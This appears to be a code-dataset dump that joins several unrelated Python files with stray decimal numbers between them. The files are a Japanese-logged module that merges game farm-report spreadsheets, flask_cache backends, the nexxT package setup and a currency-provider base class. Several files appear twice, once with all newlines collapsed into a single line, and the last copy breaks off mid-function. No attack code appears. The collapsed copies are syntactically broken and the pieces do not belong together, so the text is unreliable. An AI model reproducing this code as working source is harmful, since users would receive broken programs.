                    merge_result_ws.merge_cells(cell_range)
        except Exception:
            pyl.log_err(lg, f'周回報告生成結果マージ結果ファイルのセルの結合に失敗しました。')
            raise
        finally:
            if merge_result_wb is not None:
                merge_result_wb.save(merge_result_file_path)
                merge_result_wb.close()
    except Exception:
        raise

    return None
src/fgo_farm_report_collection/logic/farm_report_gen_result_merge.py
import glob
import os
from datetime import datetime
from enum import IntEnum, auto
from logging import Logger
from typing import Final, Optional, Union

import openpyxl
import pandas as pd
import python_lib_for_me as pyl
from openpyxl.worksheet.worksheet import Worksheet
from styleframe import StyleFrame, Styler, utils

from fgo_farm_report_collection.util import const_util, pandas_util


class EnumOfProc(IntEnum):
    """Kind of farm-report generation result that can be merged."""
    GENERATE_LIST = auto()
    GENERATE_USER_TOTAL_SUMMARY = auto()
    GENERATE_QUEST_TOTAL_SUMMARY = auto()
    GENERATE_INDIVIDUAL_SUMMARY = auto()


def do_logic_that_merge_list(
        append_sheet: bool
    ) -> None:
    '''Execute logic: merge farm-report list files into one workbook.'''

    lg: Optional[Logger] = None

    try:
        # Acquire logger
        lg = pyl.get_logger(__name__)
        pyl.log_inf(lg, f'周回報告一覧マージを開始します。')

        __do_logic_that_merge_gen_result(
            EnumOfProc.GENERATE_LIST,
            const_util.FARM_REPORT_LIST_FILE_PATH,
            const_util.FARM_REPORT_LIST_HEADER,
            append_sheet,
            const_util.FARM_REPORT_LIST_MERGE_RESULT_FILE_PATH,
            '周回報告一覧',
            {
                const_util.FARM_REPORT_LIST_HEADER[0]: 20,
                const_util.FARM_REPORT_LIST_HEADER[1]: 20,
                const_util.FARM_REPORT_LIST_HEADER[2]: 14,
                const_util.FARM_REPORT_LIST_HEADER[3]: 25,
                const_util.FARM_REPORT_LIST_HEADER[4]: 20,
                const_util.FARM_REPORT_LIST_HEADER[5]: 10,
                const_util.FARM_REPORT_LIST_HEADER[6]: 200,
            },
            'A4',
            ['A1:G1', 'A2:G2']
        )
    except Exception:
        # Bare raise preserves the original traceback (the original used
        # `raise(e)`, which stacks an extra re-raise frame).
        raise
    finally:
        pyl.log_inf(lg, f'周回報告一覧マージを終了します。')

    return None


def do_logic_that_merge_yearly_usr_tot_sum(
        append_sheet: bool
    ) -> None:
    '''Execute logic: merge yearly per-user total summaries.'''

    lg: Optional[Logger] = None

    try:
        # Acquire logger
        lg = pyl.get_logger(__name__)
        pyl.log_inf(lg, f'周回報告年間ユーザ全体概要マージを開始します。')

        __do_logic_that_merge_gen_result(
            EnumOfProc.GENERATE_USER_TOTAL_SUMMARY,
            const_util.FARM_REPORT_YEARLY_USR_TOT_SUM_FILE_PATH,
            const_util.FARM_REPORT_USR_TOT_SUM_HEADER,
            append_sheet,
            const_util.FARM_REPORT_YEARLY_USR_TOT_SUM_MERGE_RESULT_FILE_PATH,
            'クエスト種別ごとの年間周回数(ユーザ編)',
            {
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[0]: 20,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[1]: 20,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[2]: 10,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[3]: 10,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[4]: 13,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[5]: 13,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[6]: 13,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[7]: 13,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[8]: 15,
            },
            'A4',
            ['A1:I1', 'A2:I2']
        )
    except Exception:
        raise
    finally:
        pyl.log_inf(lg, f'周回報告年間ユーザ全体概要マージを終了します。')

    return None


def do_logic_that_merge_yearly_qst_tot_sum(
        append_sheet: bool
    ) -> None:
    '''Execute logic: merge yearly per-quest total summaries.'''

    lg: Optional[Logger] = None

    try:
        # Acquire logger
        lg = pyl.get_logger(__name__)
        pyl.log_inf(lg, f'周回報告年間クエスト全体概要マージを開始します。')

        __do_logic_that_merge_gen_result(
            EnumOfProc.GENERATE_QUEST_TOTAL_SUMMARY,
            const_util.FARM_REPORT_YEARLY_QST_TOT_SUM_FILE_PATH,
            const_util.FARM_REPORT_QST_TOT_SUM_HEADER,
            append_sheet,
            const_util.FARM_REPORT_YEARLY_QST_TOT_SUM_MERGE_RESULT_FILE_PATH,
            'クエスト種別ごとの年間周回数(クエスト編)',
            {
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[0]: 20,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[1]: 20,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[2]: 10,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[3]: 10,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[4]: 13,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[5]: 13,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[6]: 13,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[7]: 13,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[8]: 15,
            },
            'A4',
            ['A1:I1', 'A2:I2']
        )
    except Exception:
        raise
    finally:
        pyl.log_inf(lg, f'周回報告年間クエスト全体概要マージを終了します。')

    return None


def do_logic_that_merge_monthly_usr_tot_sum(
        append_sheet: bool
    ) -> None:
    '''Execute logic: merge monthly per-user total summaries.'''

    lg: Optional[Logger] = None

    try:
        # Acquire logger
        lg = pyl.get_logger(__name__)
        pyl.log_inf(lg, f'周回報告月間ユーザ全体概要マージを開始します。')

        __do_logic_that_merge_gen_result(
            EnumOfProc.GENERATE_USER_TOTAL_SUMMARY,
            const_util.FARM_REPORT_MONTHLY_USR_TOT_SUM_FILE_PATH,
            const_util.FARM_REPORT_USR_TOT_SUM_HEADER,
            append_sheet,
            const_util.FARM_REPORT_MONTHLY_USR_TOT_SUM_MERGE_RESULT_FILE_PATH,
            'クエスト種別ごとの月間周回数(ユーザ編)',
            {
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[0]: 20,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[1]: 20,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[2]: 10,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[3]: 10,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[4]: 13,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[5]: 13,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[6]: 13,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[7]: 13,
                const_util.FARM_REPORT_USR_TOT_SUM_HEADER[8]: 15,
            },
            'A4',
            ['A1:I1', 'A2:I2']
        )
    except Exception:
        raise
    finally:
        pyl.log_inf(lg, f'周回報告月間ユーザ全体概要マージを終了します。')

    return None


def do_logic_that_merge_monthly_qst_tot_sum(
        append_sheet: bool
    ) -> None:
    '''Execute logic: merge monthly per-quest total summaries.'''

    lg: Optional[Logger] = None

    try:
        # Acquire logger
        lg = pyl.get_logger(__name__)
        pyl.log_inf(lg, f'周回報告月間クエスト全体概要マージを開始します。')

        __do_logic_that_merge_gen_result(
            EnumOfProc.GENERATE_QUEST_TOTAL_SUMMARY,
            const_util.FARM_REPORT_MONTHLY_QST_TOT_SUM_FILE_PATH,
            const_util.FARM_REPORT_QST_TOT_SUM_HEADER,
            append_sheet,
            const_util.FARM_REPORT_MONTHLY_QST_TOT_SUM_MERGE_RESULT_FILE_PATH,
            'クエスト種別ごとの月間周回数(クエスト編)',
            {
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[0]: 20,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[1]: 20,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[2]: 10,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[3]: 10,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[4]: 13,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[5]: 13,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[6]: 13,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[7]: 13,
                const_util.FARM_REPORT_QST_TOT_SUM_HEADER[8]: 15,
            },
            'A4',
            ['A1:I1', 'A2:I2']
        )
    except Exception:
        raise
    finally:
        pyl.log_inf(lg, f'周回報告月間クエスト全体概要マージを終了します。')

    return None


def do_logic_that_merge_ind_sum(
        append_sheet: bool
    ) -> None:
    '''Execute logic: merge individual (per-user) summaries.'''

    lg: Optional[Logger] = None

    try:
        # Acquire logger
        lg = pyl.get_logger(__name__)
        pyl.log_inf(lg, f'周回報告個人概要マージを開始します。')

        __do_logic_that_merge_gen_result(
            EnumOfProc.GENERATE_INDIVIDUAL_SUMMARY,
            const_util.FARM_REPORT_IND_SUM_FILE_PATH,
            const_util.FARM_REPORT_IND_SUM_HEADER,
            append_sheet,
            const_util.FARM_REPORT_IND_SUM_MERGE_RESULT_FILE_PATH,
            'ユーザごとの周回数',
            {
                const_util.FARM_REPORT_IND_SUM_HEADER[0]: 10,
                const_util.FARM_REPORT_IND_SUM_HEADER[1]: 17,
                const_util.FARM_REPORT_IND_SUM_HEADER[2]: 17,
                const_util.FARM_REPORT_IND_SUM_HEADER[3]: 17,
            },
            'A4',
            ['A1:D1', 'A2:D2']
        )
    except Exception:
        raise
    finally:
        pyl.log_inf(lg, f'周回報告個人概要マージを終了します。')

    return None


def __do_logic_that_merge_gen_result(
        enum_of_proc: EnumOfProc,
        gen_result_file_path_format: str,
        gen_result_header: list[str],
        append_merge_result_sheet: bool,
        merge_result_file_path: str,
        merge_result_book_name: str,
        merge_result_column_widths: dict[str, Union[int, float]],
        merge_result_cell_to_fix_window_frame: str,
        merge_result_ranges_to_merge_cells: list[str]
    ) -> None:
    '''Common merge logic: collect generation-result files matching the
    given path pattern and merge them into a single styled workbook.'''

    lg: Optional[Logger] = None

    try:
        # Acquire logger
        lg = pyl.get_logger(__name__)
        pyl.log_inf(lg, f'周回報告生成結果マージ(共通)を開始します。')

        # Build a wildcard path from the directory and extension of the
        # format path, then glob all generation-result files.
        gen_result_file_dir: str = os.path.dirname(gen_result_file_path_format)
        gen_result_file_ext: str = os.path.splitext(gen_result_file_path_format)[1]
        gen_result_file_path_with_wildcard: str = \
            gen_result_file_dir + '/*' + gen_result_file_ext
        gen_result_file_paths: list[str] = glob.glob(gen_result_file_path_with_wildcard)

        # Nothing to merge: warn and return.
        if len(gen_result_file_paths) == 0:
            pyl.log_war(lg, f'周回報告生成結果ファイルの件数が0件です。' +
                            f'(gen_result_file_path:{gen_result_file_path_with_wildcard})')
        else:
            # Generate the merged workbook with pandas/StyleFrame
            __generate_merge_result_file_by_pandas(
                enum_of_proc,
                gen_result_file_paths,
                gen_result_header,
                append_merge_result_sheet,
                merge_result_file_path,
                merge_result_book_name,
                merge_result_column_widths,
                merge_result_cell_to_fix_window_frame
            )

            # Post-process the workbook with OpenPyXL (cell merging)
            __edit_merge_result_file_by_openpyxl(
                merge_result_file_path,
                merge_result_ranges_to_merge_cells
            )

            pyl.log_inf(lg, f'周回報告マージ結果ファイルパス:{merge_result_file_path}')
    except Exception:
        raise
    finally:
        pyl.log_inf(lg, f'周回報告生成結果マージ(共通)を終了します。')

    return None


def __generate_merge_result_file_by_pandas(
        enum_of_proc: EnumOfProc,
        gen_result_file_paths: list[str],
        gen_result_header: list[str],
        append_merge_result_sheet: bool,
        merge_result_file_path: str,
        merge_result_book_name: str,
        merge_result_column_widths: dict[str, Union[int, float]],
        merge_result_cell_to_fix_window_frame: str
    ) -> None:
    '''Generate the merged result workbook (pandas/StyleFrame): one sheet
    per generation-result file, each with a two-row header part and a
    styled data part.'''

    lg: Optional[Logger] = None

    try:
        # Acquire logger
        lg = pyl.get_logger(__name__)

        excel_writer: Optional[pd.ExcelWriter] = None
        try:
            # Create the Excel writer; append mode only when requested AND
            # the target workbook already exists.
            if append_merge_result_sheet \
                    and os.path.isfile(merge_result_file_path):
                excel_writer = StyleFrame.ExcelWriter(
                    merge_result_file_path,
                    mode='a',
                    if_sheet_exists='replace',  # overlay not working
                )
            else:
                excel_writer = StyleFrame.ExcelWriter(
                    merge_result_file_path,
                    mode='w',
                )

            # Write one sheet per generation-result file (newest first).
            for gen_result_file_path in reversed(gen_result_file_paths):
                pyl.log_inf(lg, f'周回報告生成結果ファイルパス:{gen_result_file_path}')

                # Sheet name derived from the source file name
                merge_result_sheet_name: str = pyl.generate_file_name(gen_result_file_path)

                # Header-part StyleFrames (title rows + update timestamp)
                merge_result_header_part_sfs: list[StyleFrame] = \
                    __generate_merge_result_header_part_sfs(
                        merge_result_book_name, merge_result_sheet_name, gen_result_header)

                # Load the generation-result DataFrame for this proc kind
                gen_result_df: pd.DataFrame = pd.DataFrame()
                if enum_of_proc == EnumOfProc.GENERATE_LIST:
                    gen_result_df = pandas_util.read_farm_report_list_file(
                        gen_result_file_path, True, True)
                elif enum_of_proc == EnumOfProc.GENERATE_USER_TOTAL_SUMMARY:
                    gen_result_df = pandas_util.read_farm_report_usr_tot_sum_file(
                        gen_result_file_path, True, True)
                elif enum_of_proc == EnumOfProc.GENERATE_QUEST_TOTAL_SUMMARY:
                    gen_result_df = pandas_util.read_farm_report_qst_tot_sum_file(
                        gen_result_file_path, True, True)
                elif enum_of_proc == EnumOfProc.GENERATE_INDIVIDUAL_SUMMARY:
                    gen_result_df = pandas_util.read_farm_report_ind_sum_file(
                        gen_result_file_path, True, True)

                # Apply formatting to the data part
                merge_result_data_part_sf: StyleFrame = __apply_formatting_to_gen_result(
                    gen_result_df, merge_result_column_widths)

                # Save header + data StyleFrames to the sheet
                pandas_util.save_farm_report_merge_result_sf(
                    merge_result_header_part_sfs,
                    merge_result_data_part_sf,
                    excel_writer,
                    merge_result_sheet_name,
                    cell_to_fix_window_frame=merge_result_cell_to_fix_window_frame,
                )
        except Exception:
            pyl.log_err(lg, f'周回報告生成結果マージ結果ファイルへの出力に失敗しました。')
            raise
        finally:
            if excel_writer is not None:
                excel_writer.close()
    except Exception:
        raise

    return None


def __generate_merge_result_header_part_sfs(
        merge_result_book_name: str,
        merge_result_sheet_name: str,
        gen_result_header: list[str]
    ) -> list[StyleFrame]:
    '''Build the two header-part StyleFrames: (1) book/sheet title columns
    padded to the header width, (2) the update date/time column.'''

    merge_result_header_part_sfs: list[StyleFrame] = []

    # Header part 01: title column followed by empty padding columns so the
    # header spans the same width as the data header.
    merge_result_header_part_col_num: int = 0
    merge_result_header_part_01_df: pd.DataFrame = pd.DataFrame({
        f'col_{merge_result_header_part_col_num}':
            [merge_result_book_name, merge_result_sheet_name]
    })
    for _ in range(len(gen_result_header) - 1):
        merge_result_header_part_col_num = merge_result_header_part_col_num + 1
        merge_result_header_part_01_df[f'col_{merge_result_header_part_col_num}'] = ''

    # Apply formatting to header part 01
    merge_result_header_part_01_sf: StyleFrame = \
        __apply_formatting_to_merge_result_header_part(
            merge_result_header_part_01_df, is_update_datetime_col=False)

    # Current update timestamp
    update_datetime: datetime = datetime.now()
    update_date: str = update_datetime.strftime('%Y-%m-%d')
    update_time: str = update_datetime.strftime('%H:%M:%S')

    # Header part 02: single right-aligned date/time column
    merge_result_header_part_col_num = merge_result_header_part_col_num + 1
    merge_result_header_part_02_df: pd.DataFrame = \
        pd.DataFrame({f'col_{merge_result_header_part_col_num}':
                      [update_date, update_time]})

    # Apply formatting to header part 02
    merge_result_header_part_02_sf: StyleFrame = \
        __apply_formatting_to_merge_result_header_part(
            merge_result_header_part_02_df, is_update_datetime_col=True)

    # Collect both parts in order
    merge_result_header_part_sfs.append(merge_result_header_part_01_sf)
    merge_result_header_part_sfs.append(merge_result_header_part_02_sf)

    return merge_result_header_part_sfs


def __apply_formatting_to_merge_result_header_part(
        merge_result_header_part_df: pd.DataFrame,
        merge_result_column_widths: dict[str, Union[int, float]] = {},
        is_update_datetime_col: bool = False
    ) -> StyleFrame:
    '''Apply formatting to a merge-result header part; the date/time column
    is right-aligned and shrink-to-fit.'''

    DATETIME_FORMAT: Final[str] = 'YYYY-MM-DD HH:MM:SS'

    # Default cell style
    default_style: Styler = Styler(
        bg_color=None,
        bold=False,
        font=const_util.FONT_NAME,
        font_size=const_util.FONT_SIZE,
        number_format=utils.number_formats.general,
        horizontal_alignment=(utils.horizontal_alignments.general
                              if is_update_datetime_col == False
                              else utils.horizontal_alignments.right),
        wrap_text=False,
        shrink_to_fit=False if is_update_datetime_col == False else True,
        date_time_format=DATETIME_FORMAT,
    )
    merge_result_header_part_sf: StyleFrame = \
        StyleFrame(merge_result_header_part_df, default_style)

    # Column widths
    merge_result_header_part_sf.set_column_width_dict(merge_result_column_widths)

    # Row heights (all but the last index entry)
    row_indexes: tuple = merge_result_header_part_sf.row_indexes
    merge_result_header_part_sf.set_row_height_dict({
        row_indexes[:len(row_indexes) - 1]: 20,
    })

    return merge_result_header_part_sf


def __apply_formatting_to_gen_result(
        gen_result_df: pd.DataFrame,
        merge_result_column_widths: dict[str, Union[int, float]] = {}
    ) -> StyleFrame:
    '''Apply formatting to the generation-result data part (default cell
    style, grey bold header row, column widths, row heights).'''

    DATETIME_FORMAT: Final[str] = 'YYYY-MM-DD HH:MM:SS'

    # Default cell style
    default_style: Styler = Styler(
        bg_color=None,
        bold=False,
        font=const_util.FONT_NAME,
        font_size=const_util.FONT_SIZE,
        number_format=utils.number_formats.thousands_comma_sep,
        horizontal_alignment=utils.horizontal_alignments.general,
        wrap_text=False,
        shrink_to_fit=False,
        date_time_format=DATETIME_FORMAT,
    )
    merge_result_data_part_sf: StyleFrame = StyleFrame(gen_result_df, default_style)

    # Header row style
    header_style: Styler = Styler(
        bg_color=utils.colors.grey,
        bold=True,
        font=const_util.FONT_NAME,
        font_size=const_util.FONT_SIZE,
        number_format=utils.number_formats.general,
        horizontal_alignment=utils.horizontal_alignments.center,
        wrap_text=True,
        shrink_to_fit=False,
        date_time_format=DATETIME_FORMAT,
    )
    merge_result_data_part_sf.apply_headers_style(header_style)

    # Column widths
    merge_result_data_part_sf.set_column_width_dict(merge_result_column_widths)

    # Row heights: header row is taller; data rows (if any) are uniform.
    row_indexes: tuple = merge_result_data_part_sf.row_indexes
    if len(row_indexes) == 1:
        merge_result_data_part_sf.set_row_height_dict({
            row_indexes[0]: 30,
        })
    else:
        merge_result_data_part_sf.set_row_height_dict({
            row_indexes[0]: 30,
            row_indexes[1:]: 20,
        })

    return merge_result_data_part_sf


def __edit_merge_result_file_by_openpyxl(
        merge_result_file_path: str,
        merge_result_ranges_to_merge_cells: list[str]
    ) -> None:
    '''Edit the merged workbook with OpenPyXL: merge the given cell ranges
    on every sheet, then save.'''

    lg: Optional[Logger] = None

    try:
        # Acquire logger
        lg = pyl.get_logger(__name__)

        merge_result_wb: Optional[openpyxl.Workbook] = None
        try:
            # Merge the header cell ranges on every sheet
            merge_result_wb = openpyxl.load_workbook(merge_result_file_path)
            for sheet_name in merge_result_wb.sheetnames:
                merge_result_ws: Worksheet = merge_result_wb[sheet_name]  # type: ignore
                # `cell_range` renamed from `range`, which shadowed the builtin.
                for cell_range in merge_result_ranges_to_merge_cells:
                    merge_result_ws.merge_cells(cell_range)
        except Exception:
            pyl.log_err(lg, f'周回報告生成結果マージ結果ファイルのセルの結合に失敗しました。')
            raise
        finally:
            if merge_result_wb is not None:
                merge_result_wb.save(merge_result_file_path)
                merge_result_wb.close()
    except Exception:
        raise

    return None
0.330039
0.092647
from werkzeug.contrib.cache import (BaseCache, NullCache, SimpleCache, MemcachedCache, GAEMemcachedCache, FileSystemCache) class SASLMemcachedCache(MemcachedCache): def __init__(self, servers=None, default_timeout=300, key_prefix=None, username=None, password=<PASSWORD>): BaseCache.__init__(self, default_timeout) if servers is None: servers = ['127.0.0.1:11211'] import pylibmc self._client = pylibmc.Client(servers, username=username, password=password, binary=True) self.key_prefix = key_prefix def null(app, config, args, kwargs): return NullCache() def simple(app, config, args, kwargs): kwargs.update(dict(threshold=config['CACHE_THRESHOLD'])) return SimpleCache(*args, **kwargs) def memcached(app, config, args, kwargs): args.append(config['CACHE_MEMCACHED_SERVERS']) kwargs.update(dict(key_prefix=config['CACHE_KEY_PREFIX'])) return MemcachedCache(*args, **kwargs) def saslmemcached(app, config, args, kwargs): args.append(config['CACHE_MEMCACHED_SERVERS']) kwargs.update(dict(username=config['CACHE_MEMCACHED_USERNAME'], password=config['CACHE_MEMCACHED_PASSWORD'], key_prefix=config['CACHE_KEY_PREFIX'])) return SASLMemcachedCache(*args, **kwargs) def gaememcached(app, config, args, kwargs): kwargs.update(dict(key_prefix=config['CACHE_KEY_PREFIX'])) return GAEMemcachedCache(*args, **kwargs) def filesystem(app, config, args, kwargs): args.append(config['CACHE_DIR']) kwargs.update(dict(threshold=config['CACHE_THRESHOLD'])) return FileSystemCache(*args, **kwargs) # RedisCache is supported since Werkzeug 0.7. try: from werkzeug.contrib.cache import RedisCache except ImportError: pass else: def redis(app, config, args, kwargs): kwargs.update(dict( host=config.get('CACHE_REDIS_HOST', 'localhost'), port=config.get('CACHE_REDIS_PORT', 6379), )) password = config.get('CACHE_REDIS_PASSWORD') if password: kwargs['password'] = password key_prefix = config.get('CACHE_KEY_PREFIX') if key_prefix: kwargs['key_prefix'] = key_prefix return RedisCache(*args, **kwargs)
src/lib/flask_cache/backends.py
from werkzeug.contrib.cache import (BaseCache, NullCache, SimpleCache, MemcachedCache, GAEMemcachedCache, FileSystemCache) class SASLMemcachedCache(MemcachedCache): def __init__(self, servers=None, default_timeout=300, key_prefix=None, username=None, password=<PASSWORD>): BaseCache.__init__(self, default_timeout) if servers is None: servers = ['127.0.0.1:11211'] import pylibmc self._client = pylibmc.Client(servers, username=username, password=password, binary=True) self.key_prefix = key_prefix def null(app, config, args, kwargs): return NullCache() def simple(app, config, args, kwargs): kwargs.update(dict(threshold=config['CACHE_THRESHOLD'])) return SimpleCache(*args, **kwargs) def memcached(app, config, args, kwargs): args.append(config['CACHE_MEMCACHED_SERVERS']) kwargs.update(dict(key_prefix=config['CACHE_KEY_PREFIX'])) return MemcachedCache(*args, **kwargs) def saslmemcached(app, config, args, kwargs): args.append(config['CACHE_MEMCACHED_SERVERS']) kwargs.update(dict(username=config['CACHE_MEMCACHED_USERNAME'], password=config['CACHE_MEMCACHED_PASSWORD'], key_prefix=config['CACHE_KEY_PREFIX'])) return SASLMemcachedCache(*args, **kwargs) def gaememcached(app, config, args, kwargs): kwargs.update(dict(key_prefix=config['CACHE_KEY_PREFIX'])) return GAEMemcachedCache(*args, **kwargs) def filesystem(app, config, args, kwargs): args.append(config['CACHE_DIR']) kwargs.update(dict(threshold=config['CACHE_THRESHOLD'])) return FileSystemCache(*args, **kwargs) # RedisCache is supported since Werkzeug 0.7. try: from werkzeug.contrib.cache import RedisCache except ImportError: pass else: def redis(app, config, args, kwargs): kwargs.update(dict( host=config.get('CACHE_REDIS_HOST', 'localhost'), port=config.get('CACHE_REDIS_PORT', 6379), )) password = config.get('CACHE_REDIS_PASSWORD') if password: kwargs['password'] = password key_prefix = config.get('CACHE_KEY_PREFIX') if key_prefix: kwargs['key_prefix'] = key_prefix return RedisCache(*args, **kwargs)
0.464173
0.047338
def setup(): try: from importlib import metadata except ImportError: # Running on pre-3.8 Python; use importlib-metadata package import importlib_metadata as metadata import logging from pathlib import Path import os import sys import platform logger = logging.getLogger() INTERNAL = 5 # setup log level for internal messages logging.addLevelName(INTERNAL, "INTERNAL") logging.INTERNAL = INTERNAL def internal(self, message, *args, **kws): if self.isEnabledFor(INTERNAL): # Yes, logger takes its '*args' as 'args'. self._log(INTERNAL, message, args, **kws) logging.Logger.internal = internal console = logging.StreamHandler() console.setFormatter(logging.Formatter("%(asctime)s %(levelname)s %(name)s: %(message)s")) logger.addHandler(console) logger.info("configured logger") logger.setLevel(logging.INFO) global __version__ __version__ = metadata.version("nexxT") global useCImpl useCImpl = not bool(int(os.environ.get("NEXXT_DISABLE_CIMPL", "0"))) if useCImpl: # make sure to import PySide2 before loading the cnexxT extension module because # there is a link-time dependency which would be impossible to resolve otherwise import PySide2.QtCore p = os.environ.get("NEXXT_CEXT_PATH", None) if p is None: variant = os.environ.get("NEXXT_VARIANT", "release") cplatform = "linux_x86_64" if platform.system() == "Linux" else "msvc_x86_64" p = [p for p in [Path(__file__).parent / "binary" / cplatform / variant, Path(__file__).parent / "binary" / cplatform / variant] if p.exists()] if len(p) > 0: p = p[0].absolute() else: p = None if p is not None: p = str(Path(p).absolute()) logger.info("c extension module search path: %s", p) sys.path.append(p) import cnexxT as imp_cnexxT global cnexxT cnexxT = imp_cnexxT def setLevel(level): ret = setLevel.origFunc(level) cnexxT.nexxT.Logging.setLogLevel(logger.level) return ret setLevel.origFunc = logger.setLevel logger.setLevel = setLevel logger.setLevel(logging.INFO) setup()
nexxT/__init__.py
def setup(): try: from importlib import metadata except ImportError: # Running on pre-3.8 Python; use importlib-metadata package import importlib_metadata as metadata import logging from pathlib import Path import os import sys import platform logger = logging.getLogger() INTERNAL = 5 # setup log level for internal messages logging.addLevelName(INTERNAL, "INTERNAL") logging.INTERNAL = INTERNAL def internal(self, message, *args, **kws): if self.isEnabledFor(INTERNAL): # Yes, logger takes its '*args' as 'args'. self._log(INTERNAL, message, args, **kws) logging.Logger.internal = internal console = logging.StreamHandler() console.setFormatter(logging.Formatter("%(asctime)s %(levelname)s %(name)s: %(message)s")) logger.addHandler(console) logger.info("configured logger") logger.setLevel(logging.INFO) global __version__ __version__ = metadata.version("nexxT") global useCImpl useCImpl = not bool(int(os.environ.get("NEXXT_DISABLE_CIMPL", "0"))) if useCImpl: # make sure to import PySide2 before loading the cnexxT extension module because # there is a link-time dependency which would be impossible to resolve otherwise import PySide2.QtCore p = os.environ.get("NEXXT_CEXT_PATH", None) if p is None: variant = os.environ.get("NEXXT_VARIANT", "release") cplatform = "linux_x86_64" if platform.system() == "Linux" else "msvc_x86_64" p = [p for p in [Path(__file__).parent / "binary" / cplatform / variant, Path(__file__).parent / "binary" / cplatform / variant] if p.exists()] if len(p) > 0: p = p[0].absolute() else: p = None if p is not None: p = str(Path(p).absolute()) logger.info("c extension module search path: %s", p) sys.path.append(p) import cnexxT as imp_cnexxT global cnexxT cnexxT = imp_cnexxT def setLevel(level): ret = setLevel.origFunc(level) cnexxT.nexxT.Logging.setLogLevel(logger.level) return ret setLevel.origFunc = logger.setLevel logger.setLevel = setLevel logger.setLevel(logging.INFO) setup()
0.232746
0.127381
from abc import ABC, abstractmethod from datetime import datetime from functools import wraps import re from typing import Any, Callable, Dict, Iterable, TypeVar from urllib.parse import urljoin, urlparse, urlunparse, urlencode from urllib.request import Request from calculate_anything.currency.data import CurrencyData from calculate_anything.exceptions import CurrencyProviderException __all__ = ['ApiKeyCurrencyProvider', 'FreeCurrencyProvider'] RT = TypeVar('RT') class CurrencyProvider(ABC): BASE_URL: str API_URL: str class Decorators: @staticmethod def with_ratelimit(func: Callable[..., RT]) -> RT: @wraps(func) def _wrapper( self: 'CurrencyProvider', *currencies: Iterable[str], force: bool = False ) -> Any: timestamp = datetime.now().timestamp() if ( not force and self.had_error and timestamp - 60 <= self.last_request_timestamp ): raise CurrencyProviderException('Too many requests') self.last_request_timestamp = timestamp return func(self, *currencies, force=force) return _wrapper def __init__(self) -> None: self.last_request_timestamp = 0 self.had_error = False @classmethod def get_request(cls, params: Dict[str, str] = {}) -> Request: headers = {'user-agent': 'Calculate Anything'} url = urljoin(cls.BASE_URL, cls.API_URL) url = list(urlparse(url)) url[4] = urlencode(params) url = urlunparse(url) request = Request(url, headers=headers) # Only urls and only secure connections # Don't fucking install untrusted certs unless you want # a mitm xml bomb on your head # and no I won't install extra dependencies for your stupidity if not re.match(r'^https:\/\/', request.full_url): raise Exception('Invalid request url: {}'.format(request.full_url)) return request @abstractmethod def request_currencies( self, *currencies: str, force: bool = False ) -> CurrencyData: pass class _MockCurrencyProvider(CurrencyProvider): def __init__(self, *args, **kwargs): pass def request_currencies( self, *currencies: str, force: bool ) -> CurrencyData: pass class 
FreeCurrencyProvider(CurrencyProvider): pass class ApiKeyCurrencyProvider(CurrencyProvider): class Decorators(CurrencyProvider.Decorators): @staticmethod def with_valid_api_key(func: Callable[..., RT]) -> RT: @wraps(func) def _wrapper( self: 'ApiKeyCurrencyProvider', *args: Any, **kwargs: Any ): if not self.api_key_valid: self.had_error = True raise CurrencyProviderException('API Key is not valid') return func(self, *args, **kwargs) return _wrapper def __init__(self, api_key: str = '') -> None: super().__init__() self._api_key = api_key @property def api_key_valid(self) -> bool: return isinstance(self._api_key, str) and self._api_key.strip() != '' @property def api_key(self) -> str: return self._api_key @api_key.setter def api_key(self, api_key: str) -> None: self._api_key = api_key
calculate_anything/currency/providers/base.py
from abc import ABC, abstractmethod from datetime import datetime from functools import wraps import re from typing import Any, Callable, Dict, Iterable, TypeVar from urllib.parse import urljoin, urlparse, urlunparse, urlencode from urllib.request import Request from calculate_anything.currency.data import CurrencyData from calculate_anything.exceptions import CurrencyProviderException __all__ = ['ApiKeyCurrencyProvider', 'FreeCurrencyProvider'] RT = TypeVar('RT') class CurrencyProvider(ABC): BASE_URL: str API_URL: str class Decorators: @staticmethod def with_ratelimit(func: Callable[..., RT]) -> RT: @wraps(func) def _wrapper( self: 'CurrencyProvider', *currencies: Iterable[str], force: bool = False ) -> Any: timestamp = datetime.now().timestamp() if ( not force and self.had_error and timestamp - 60 <= self.last_request_timestamp ): raise CurrencyProviderException('Too many requests') self.last_request_timestamp = timestamp return func(self, *currencies, force=force) return _wrapper def __init__(self) -> None: self.last_request_timestamp = 0 self.had_error = False @classmethod def get_request(cls, params: Dict[str, str] = {}) -> Request: headers = {'user-agent': 'Calculate Anything'} url = urljoin(cls.BASE_URL, cls.API_URL) url = 